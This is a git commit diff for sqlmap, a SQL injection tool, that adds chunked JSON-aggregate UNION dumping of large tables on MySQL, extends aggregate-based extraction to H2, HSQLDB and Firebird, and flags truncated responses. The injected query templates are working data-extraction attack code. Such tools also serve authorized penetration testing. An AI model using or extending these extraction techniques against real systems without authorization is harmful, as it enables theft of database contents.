Improvements for JSON_AGG retrieval

This commit is contained in:
Miroslav Štampar 2026-06-20 02:28:21 +02:00
parent 497d3772bd
commit 35fefc3b65
5 changed files with 84 additions and 7 deletions

View file

@ -182,14 +182,14 @@ c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6 lib/core/data.
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
31690232f12d0590c8cbea7245ded86875f63c078da99673af4ab7451f0fffcb lib/core/optiondict.py
21b6868afc4570c9d2265427b7ea5fe8ac2e062ead3760ca3494208fde5f5e52 lib/core/option.py
7357efadb3fc8305a1b2a0b1be1915099c5c87bdbe1e95fafcd008043a58039d lib/core/option.py
ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
03db48f02c3d07a047ddb8fe33a757b6238867352d8ddda2a83e4fec09a98d04 lib/core/readlineng.py
48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
8411f42e10133c779cff837c6e51698cfebe0796f93ca9e3575a5644d64a3e04 lib/core/settings.py
f75f15165173becddf439996a85f011262178e1bf5d2d2bf8028455b7ff3ff94 lib/core/settings.py
cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py
bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py
70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py
@ -212,7 +212,7 @@ c2f34e27578742e729c2fa9c1d4f0a0d8f8f7f4cf0fc14c62ec817a260c71dec lib/parse/site
369484a2999d29f49bf839a329d1686ed94f6ea27c695e027fe08c8da51f30a3 lib/request/basic.py
bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e lib/request/chunkedhandler.py
390cc4882ba9c76e16a5376ba6d856079e7cb47a3e4ee11925139e637ce05050 lib/request/comparison.py
ec14b5139cd6b03aa167a7b91fab913baf042d4370471390c13eed325eeb245f lib/request/connect.py
b9e2db44d265909792f6cc821ff910727b14aa2d5063c74b0f2ea6d40c4f3d9d lib/request/connect.py
8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498 lib/request/direct.py
cf019248253a5d7edb7bc474aa020b9e8625d73008a463c56ba2b539d7f2d8ec lib/request/dns.py
92c81cc31ff4a396723242058fb2152c9e9745f8412d01ea74480b048a53af6c lib/request/httpshandler.py
@ -241,7 +241,7 @@ f522436fbd14bdab090a1d305fcac0361800cb8e36c8cbcb47933298376a71e0 lib/takeover/r
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
9d916ad5d61f9ce467a5ff4b416e61b8ad76d1d950fdd06f23f70a6f7f941a1c lib/techniques/union/use.py
3f834b877f0fb684e402d07af1d8a7c7d0cdb4c0a3f9f15fe8488a08d88db4f2 lib/techniques/union/use.py
aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py
442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py

View file

@ -2146,6 +2146,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.hintValue = ""
kb.htmlFp = []
kb.huffmanModel = {}
kb.respTruncated = False
kb.huffmanValidated = False
kb.disableHuffman = False
kb.huffmanProbes = 0

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.130"
VERSION = "1.10.6.131"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -226,6 +226,9 @@ MAX_TECHNIQUES_PER_VALUE = 2
# In case of missing piece of partial union dump, buffered array must be flushed after certain size
MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
# Initial number of rows aggregated per request when a full (single-shot) JSON-agg UNION dump is too large and falls back to chunked windowed aggregation (halved adaptively if a chunk response still gets truncated)
JSON_AGG_CHUNK_ROWS = 1000
# Maximum size of cache used in @cachedmethod decorator
MAX_CACHE_ITEMS = 1024

View file

@ -229,6 +229,7 @@ class Connect(object):
@staticmethod
def _connReadProxy(conn):
parts = []
kb.respTruncated = False
if not kb.dnsMode and conn:
headers = conn.info()
@ -255,6 +256,7 @@ class Connect(object):
singleTimeWarnMessage(warnMsg)
part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part)
parts.append(part)
kb.respTruncated = True # response exceeded the read cap and was trimmed (signal for chunked UNION dumping)
else:
parts.append(part)
break
@ -262,6 +264,7 @@ class Connect(object):
if sum(len(_) for _ in parts) > MAX_CONNECTION_TOTAL_SIZE:
warnMsg = "too large response detected. Automatically trimming it"
singleTimeWarnMessage(warnMsg)
kb.respTruncated = True
break
if conf.yuge:

View file

@ -50,6 +50,7 @@ from lib.core.enums import HTTP_HEADER
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import JSON_AGG_CHUNK_ROWS
from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH
from lib.core.settings import NULL
from lib.core.settings import SQL_SCALAR_REGEX
@ -129,7 +130,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
retVal = None
else:
retVal = getUnicode(retVal)
elif Backend.isDbms(DBMS.PGSQL):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.H2, DBMS.HSQLDB, DBMS.FIREBIRD):
output = extractRegexResult(r"(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
if output:
retVal = output
@ -150,6 +151,14 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
if retVal:
break
# Detect a single-shot aggregate that was too large to return whole, so the caller can
# switch to chunked (windowed) aggregation: either the response carries the leading
# marker but no trailing one (cut mid-aggregate by sqlmap's cap and/or a silent DBMS
# truncation, regardless of compression), or the DBMS refused it outright with a packet
# size error (e.g. MySQL "Result of json_arrayagg() was larger than max_allowed_packet").
if retVal is None and page and ((kb.chars.start in page and kb.chars.stop not in page) or "max_allowed_packet" in page):
kb.respTruncated = True
else:
# Parse the returned page to get the exact UNION-based
# SQL injection output
@ -237,6 +246,55 @@ def configUnion(char=None, columns=None):
_configUnionChar(char)
_configUnionCols(conf.uCols or columns)
def _chunkedJsonAggUse(expression, expressionFields, expressionFieldsList, count):
    """
    Fallback for when a full (single-shot) JSON-agg UNION table dump is too large to be returned
    whole (DBMS packet limit / sqlmap response cap). Instead of dropping to the slow per-row UNION
    path, rows are aggregated in bounded windows of K rows per request (JSON_ARRAYAGG over a
    LIMIT-windowed subquery), keeping near full-UNION throughput while staying well under the
    caps. K starts at JSON_AGG_CHUNK_ROWS and is halved adaptively (down to 1) if a chunk
    response still gets truncated.

    Arguments:
        expression           -- original SELECT statement being dumped (a trailing ORDER BY is dropped)
        expressionFields     -- raw field list of the expression (only checked for emptiness here)
        expressionFieldsList -- individual fields; used for the aggregated value and the ordering
        count                -- number of entries expected (upper bound for the window offset)

    Returns a BigArray of rows, or None to let the caller fall back to the regular per-row
    UNION path (non-MySQL back-end, missing fields or a window that could not be parsed).

    NOTE: MySQL only for now (windowed 'LIMIT offset,K' + JSON_ARRAYAGG); other DBMSes return None.
    """

    # cheap argument checks go first, back-end state is consulted only when there is work to do
    if not expressionFields or not expressionFieldsList or not Backend.isDbms(DBMS.MYSQL):
        return None

    # a stable total ordering (all output columns) so the LIMIT/OFFSET windows never overlap or drop rows
    base = re.sub(r"(?i)\s+ORDER BY\s+.+\Z", "", expression)
    orderBy = "ORDER BY %s" % ','.join(str(_ + 1) for _ in range(len(expressionFieldsList)))
    aggFields = "CONCAT_WS('%s',%s)" % (kb.chars.delimiter, ','.join(agent.nullAndCastField(_) for _ in expressionFieldsList))

    debugMsg = "single-shot UNION dump output was too large; switching to "
    debugMsg += "chunked (windowed) JSON aggregation of %d entries" % count
    singleTimeDebugMessage(debugMsg)

    retVal = BigArray()
    chunk = JSON_AGG_CHUNK_ROWS
    offset = 0

    while offset < count:
        inner = "%s %s LIMIT %d,%d" % (base, orderBy, offset, chunk)
        query = "SELECT CONCAT('%s',JSON_ARRAYAGG(%s),'%s') FROM (%s) AS sqmapx" % (kb.chars.start, aggFields, kb.chars.stop, inner)

        # The truncation flag is refreshed only when a response is actually read; clear it here so
        # that a value left over from an earlier request (e.g. the failed single-shot attempt that
        # led to this fallback) can't be mistaken for a truncation of the current window
        kb.respTruncated = False

        kb.jsonAggMode = True
        try:
            output = _oneShotUnionUse(query, False)
        finally:
            # always restore the global parsing mode, even if the request raised
            kb.jsonAggMode = False

        if kb.respTruncated and chunk > 1:
            chunk = max(1, chunk // 2)  # a single chunk is still too big -> shrink and retry same window
            continue

        rows = parseUnionPage(output)
        if rows is None:
            return None  # unexpected failure -> let the caller fall back to the per-row path

        retVal.extend(arrayizeValue(rows))
        offset += chunk

    return retVal
def unionUse(expression, unpack=True, dump=False):
"""
This function tests for an UNION SQL injection on the target
@ -268,7 +326,7 @@ def unionUse(expression, unpack=True, dump=False):
debugMsg += "it does not play well with UNION query SQL injection"
singleTimeDebugMessage(debugMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE, DBMS.H2, DBMS.HSQLDB, DBMS.FIREBIRD) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I)
if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT|EXISTS)\(", expression):
kb.jsonAggMode = True
@ -282,6 +340,10 @@ def unionUse(expression, unpack=True, dump=False):
query = expression.replace(expressionFields, "STRING_AGG('%s'||%s||'%s','')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.MSSQL):
query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop)
elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.HSQLDB):
query = expression.replace(expressionFields, "GROUP_CONCAT('%s'||%s||'%s' SEPARATOR '')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.FIREBIRD):
query = expression.replace(expressionFields, "LIST('%s'||%s||'%s','')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1)
output = _oneShotUnionUse(query, False)
value = parseUnionPage(output)
kb.jsonAggMode = False
@ -336,6 +398,14 @@ def unionUse(expression, unpack=True, dump=False):
return value
if isNumPosStrValue(count) and int(count) > 1:
# The single-shot full UNION dump failed and the table is large (or its oversized
# response was detected as truncated): retrieve the rows in bounded windows via
# chunked JSON aggregation (K rows/request) instead of the slow per-row path below.
if Backend.isDbms(DBMS.MYSQL) and not any((kb.forcePartialUnion, conf.forcePartial, conf.disableJson, conf.binaryFields, conf.limitStart, conf.limitStop)) and (int(count) >= JSON_AGG_CHUNK_ROWS or kb.respTruncated):
chunked = _chunkedJsonAggUse(expression, expressionFields, expressionFieldsList, int(count))
if chunked is not None:
return chunked
threadData = getCurrentThreadData()
try: